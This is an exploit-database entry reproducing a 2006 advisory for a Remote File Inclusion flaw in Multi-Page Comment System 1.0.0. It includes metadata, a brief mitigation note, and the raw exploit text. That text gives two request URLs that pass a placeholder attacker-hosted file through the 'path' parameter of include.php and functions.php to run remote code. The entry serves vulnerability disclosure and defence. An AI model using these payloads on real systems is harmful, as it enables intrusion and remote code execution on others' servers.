header-logo
Suggest Exploit
vendor:
Multi-Page Comment System (MPCS)
by:
v1per-haCker
9,3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Multi-Page Comment System (MPCS)
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Multi-Page Comment System (RFI)

The Multi-Page Comment System (MPCS) is vulnerable to a Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the 'path' parameter of the 'include.php' and 'functions.php' scripts. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

#==================================================================
#  Multi-Page Comment System (RFI)
#==================================================================
# Info:-
#
# Scripts:  Multi-Page Comment System (MPCS)
# Home: http://tpvgames.co.uk/web/mpcs/
# Download: http://myweb.tiscali.co.uk/williamshost/mpcs.zip
# Version : 1.0.0
# Dork & vuln : download scripts and think :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/include.php?path=http://EvElCoDe.txt?
#http://localhost/path/functions.php?path=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#               ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#           metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero
#And all members in XP10_hackEr Team
#Thanx to str0ke :)
#WWW.XP10.COM
#
#==================================================================

# milw0rm.com [2006-10-26]

Navigation

Suggest Exploit

Services By CQR